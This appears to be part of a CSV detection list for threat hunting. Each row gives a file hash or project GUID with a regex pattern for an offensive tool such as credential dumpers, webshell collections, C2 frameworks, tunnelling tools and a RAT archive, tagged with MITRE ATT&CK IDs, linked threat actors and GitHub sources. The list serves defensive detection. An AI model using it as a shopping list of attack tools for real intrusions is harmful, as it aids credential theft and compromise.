"*f6955930082d6cb41401cd02d95e0f79bf44f92918adc18bdbd5aef7207625d1*",".{0,1000}f6955930082d6cb41401cd02d95e0f79bf44f92918adc18bdbd5aef7207625d1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44120"
"*f6a47b25b4d9fa389de6360c9527c638a65bd2ee3c45d0f8b2b67afabf039f72*",".{0,1000}f6a47b25b4d9fa389de6360c9527c638a65bd2ee3c45d0f8b2b67afabf039f72.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44121"
"*f6b986ccaaf37e82ac9dbea5107d35af95b18aff0f33450c9876b051e2e6ba9c*",".{0,1000}f6b986ccaaf37e82ac9dbea5107d35af95b18aff0f33450c9876b051e2e6ba9c.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","44125"
"*f6bb09ea48d85445fb1295a7b93ead6700a17c8f839624871f4faf024e18e39f*",".{0,1000}f6bb09ea48d85445fb1295a7b93ead6700a17c8f839624871f4faf024e18e39f.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","44126"
"*f6c0d79de6c79b74f249d3f3ee8d5066459e94e254723022b63c2a53a82b2e81*",".{0,1000}f6c0d79de6c79b74f249d3f3ee8d5066459e94e254723022b63c2a53a82b2e81.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44127"
"*f6da5084b596592c4f64b70548b40a8850cb26218fabe7e1baeca5357653cad9*",".{0,1000}f6da5084b596592c4f64b70548b40a8850cb26218fabe7e1baeca5357653cad9.{0,1000}","offensive_tool_keyword","POC","Windows Privilege escalation POC exploitation for CVE-2024-49138","T1068 - T1058 - T1203","TA0004","N/A","N/A","Privilege Escalation","https://github.com/emdnaia/CVE-2024-49138-POC","1","0","#filehash","N/A","9","1","1","0","2025-01-15T01:01:21Z","2025-01-15T02:11:49Z","44132"
"*f6e0cfff7d80e0673848a96bc1e667c2716dec682c4f61156f83b070b9da8b4e*",".{0,1000}f6e0cfff7d80e0673848a96bc1e667c2716dec682c4f61156f83b070b9da8b4e.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","44134"
"*f6e16eee3494ad168fa124552fba957ba8ddf8e7d96eedeef33f9e2afe1e9257*",".{0,1000}f6e16eee3494ad168fa124552fba957ba8ddf8e7d96eedeef33f9e2afe1e9257.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","#filehash","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","44135"
"*f6e25a72071f1dcfc6f383a694cd1a8c1889560593abf02b45451c6c7a851aca*",".{0,1000}f6e25a72071f1dcfc6f383a694cd1a8c1889560593abf02b45451c6c7a851aca.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","44136"
"*f6e3f58333eee37bb52f603b1c8f9aa73d16ec2051f6349284d0f09c8847bb60*",".{0,1000}f6e3f58333eee37bb52f603b1c8f9aa73d16ec2051f6349284d0f09c8847bb60.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","44138"
"*f6ee090c3a4390f45e236b0a169b9b15a6a9094881a9f1336937a9d13d9fc5d6*",".{0,1000}f6ee090c3a4390f45e236b0a169b9b15a6a9094881a9f1336937a9d13d9fc5d6.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","44139"
"*f6efa1ba7a66dddb2a14a652d4f96f365c73e3b15f5f40822eefbff9fc46a57c*",".{0,1000}f6efa1ba7a66dddb2a14a652d4f96f365c73e3b15f5f40822eefbff9fc46a57c.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","#filehash","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","44141"
"*f6f082606e6725734c4ad3fef4e9d1ae5669ebab5c9085e6ab3b409793ca2000*",".{0,1000}f6f082606e6725734c4ad3fef4e9d1ae5669ebab5c9085e6ab3b409793ca2000.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","0","#filehash","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","44142"
"*f6f65c22bb7a4f263d745b83a959cc8b295eadbc9f458afb437b716ad3fac833*",".{0,1000}f6f65c22bb7a4f263d745b83a959cc8b295eadbc9f458afb437b716ad3fac833.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44143"
"*f6f865390750822cea504855053b4fe017001235f63f628f8433dab6f3b15582*",".{0,1000}f6f865390750822cea504855053b4fe017001235f63f628f8433dab6f3b15582.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44144"
"*f6f8e3cb6081848ade48d449319f92832c45ecf01a7df1d3400bdf0a275e7e32*",".{0,1000}f6f8e3cb6081848ade48d449319f92832c45ecf01a7df1d3400bdf0a275e7e32.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","44145"
"*f70320403ba17e7643e7bd26f62bf42b6c01e184d40a2af0f5b46608d31f79e6*",".{0,1000}f70320403ba17e7643e7bd26f62bf42b6c01e184d40a2af0f5b46608d31f79e6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","44146"
"*F70D2B71-4AAE-4B24-9DAE-55BC819C78BB*",".{0,1000}F70D2B71\-4AAE\-4B24\-9DAE\-55BC819C78BB.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#GUIDproject","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","44147"
"*f71501c6dbf8e31c30fabed0786fa3145af0e8862712f5803c0c4177fb8d1836*",".{0,1000}f71501c6dbf8e31c30fabed0786fa3145af0e8862712f5803c0c4177fb8d1836.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","0","#filehash","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","44148"
"*f724f2ad9e30f001e16034efa68757a3baf31fe918a71722b529a53f71c3bac0*",".{0,1000}f724f2ad9e30f001e16034efa68757a3baf31fe918a71722b529a53f71c3bac0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44150"
"*f7267a8880e45961219a6204a3a8ae5fff31e495f3f930e487f80cf89850f16f*",".{0,1000}f7267a8880e45961219a6204a3a8ae5fff31e495f3f930e487f80cf89850f16f.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","#filehash","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","44152"
"*f729be9878e7eb22412c98c5d28811a96e773b40333789717af19c6b218d9d22*",".{0,1000}f729be9878e7eb22412c98c5d28811a96e773b40333789717af19c6b218d9d22.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","44153"
"*f72e7336b7159fd38671d4150fb30894422fca78b0a8f214a15bb53a36b82cf4*",".{0,1000}f72e7336b7159fd38671d4150fb30894422fca78b0a8f214a15bb53a36b82cf4.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","44154"
"*f72fc36ad8ba09bf2a911d35badb9d702835768087889bef378285e1d088cdc7*",".{0,1000}f72fc36ad8ba09bf2a911d35badb9d702835768087889bef378285e1d088cdc7.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","44155"
"*f7306e6b984b5e7316ef8adab27eacd18bb6edfb249d704c26abf085ded69bd4*",".{0,1000}f7306e6b984b5e7316ef8adab27eacd18bb6edfb249d704c26abf085ded69bd4.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","44156"
"*f7353868e1e35feb2bbd3a1b478698217a4cd06679fdb5dc8cc90f5232caa94b*",".{0,1000}f7353868e1e35feb2bbd3a1b478698217a4cd06679fdb5dc8cc90f5232caa94b.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","44157"
"*f745fdbab44bfd54a5997a5d8746a602eb3af30c10d3fd264edbc705a8bb6e2a*",".{0,1000}f745fdbab44bfd54a5997a5d8746a602eb3af30c10d3fd264edbc705a8bb6e2a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44159"
"*F74BACC239A453DA97AACA6C0E9E70D2282CE801EC9A1262A8F3237CCFC27E9A*",".{0,1000}F74BACC239A453DA97AACA6C0E9E70D2282CE801EC9A1262A8F3237CCFC27E9A.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","44160"
"*f74f648e1f204b440412e63a970d6ab69fc5e09923a7eda0488fc45d7edc147e*",".{0,1000}f74f648e1f204b440412e63a970d6ab69fc5e09923a7eda0488fc45d7edc147e.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","44161"
"*f74fb8cb7977e6256a91d07cb09beca1b498a355162d0793e06924bf7cab2e95*",".{0,1000}f74fb8cb7977e6256a91d07cb09beca1b498a355162d0793e06924bf7cab2e95.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","44162"
"*f752cf3610b17c90e8a4b03ffd0dc9de1f2005108556708108f940e78d57bde6*",".{0,1000}f752cf3610b17c90e8a4b03ffd0dc9de1f2005108556708108f940e78d57bde6.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","44163"
"*f754b58f7856cd66b9297531df8a2eb328c5d2468b1a9489f3aca538e85a6c9e*",".{0,1000}f754b58f7856cd66b9297531df8a2eb328c5d2468b1a9489f3aca538e85a6c9e.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","44164"
"*f75750934e4291853a7f536ba36a8e478066105b7c2b8d256d4ecb17d8bc60ee*",".{0,1000}f75750934e4291853a7f536ba36a8e478066105b7c2b8d256d4ecb17d8bc60ee.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","44165"
"*f757dcfc3ab68b9af0445c5672dd92d8bc246b9135f2896aecbc6f3849f31ad8*",".{0,1000}f757dcfc3ab68b9af0445c5672dd92d8bc246b9135f2896aecbc6f3849f31ad8.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","44166"
"*F7581FB4-FAF5-4CD0-888A-B588F5BC69CD*",".{0,1000}F7581FB4\-FAF5\-4CD0\-888A\-B588F5BC69CD.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","44167"
"*f75cca99da6b3693e3310767256f62228a4451435e4f4301fa7dc95bef9c92ff*",".{0,1000}f75cca99da6b3693e3310767256f62228a4451435e4f4301fa7dc95bef9c92ff.{0,1000}","offensive_tool_keyword","powercat","Netcat - The powershell version","T1571 - T1048.003 - T1095","TA0042 - TA0011","N/A","N/A","C2","https://github.com/besimorhino/powercat","1","0","#filehash","N/A","10","10","2229","482","2024-03-05T18:05:07Z","2014-08-21T14:38:46Z","44168"
"*f7685768c93c8405a525090484261be417913ca2bcfdcce9596856dc3b5c64e0*",".{0,1000}f7685768c93c8405a525090484261be417913ca2bcfdcce9596856dc3b5c64e0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44169"
"*f76cc170f78f8eb5d9c264e92761e1ceb26a50672c8c3372a18113b51f1530b3*",".{0,1000}f76cc170f78f8eb5d9c264e92761e1ceb26a50672c8c3372a18113b51f1530b3.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","44170"
"*f77bd4b1b89324c9b873cd5552249c0217d1fd82a317b88e9c78a59448192f87*",".{0,1000}f77bd4b1b89324c9b873cd5552249c0217d1fd82a317b88e9c78a59448192f87.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","44172"
"*f782f45b12b4185bb97a35da2fac19b3bff53b2b6f98617cc130e756b37f92d4*",".{0,1000}f782f45b12b4185bb97a35da2fac19b3bff53b2b6f98617cc130e756b37f92d4.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","44173"
"*f7845353ef571f06a7adcee718b59370c3f8717cfebe76fe1bbc08c59ab677eb*",".{0,1000}f7845353ef571f06a7adcee718b59370c3f8717cfebe76fe1bbc08c59ab677eb.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","44174"
"*f7851e5b0bca91e7ae15d879a7c5be4f63014c2c4b85bc756f6eddcf8c1eaa39*",".{0,1000}f7851e5b0bca91e7ae15d879a7c5be4f63014c2c4b85bc756f6eddcf8c1eaa39.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44175"
"*f791fdf3865ad607dcc1f0d7f1cd52ff8eb6f976a9b6f3f48fe1b0c3d73e3fdc*",".{0,1000}f791fdf3865ad607dcc1f0d7f1cd52ff8eb6f976a9b6f3f48fe1b0c3d73e3fdc.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","44176"
"*f7999c6975478cdc9494892dd265cd24801576f46b33bb72cc9c942424d63e4b*",".{0,1000}f7999c6975478cdc9494892dd265cd24801576f46b33bb72cc9c942424d63e4b.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","44177"
"*f7a755d30fe841ce34b0ef2f4bd3265fab3623945636267c3d5d67c111a9a2a3*",".{0,1000}f7a755d30fe841ce34b0ef2f4bd3265fab3623945636267c3d5d67c111a9a2a3.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#filehash","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","44180"
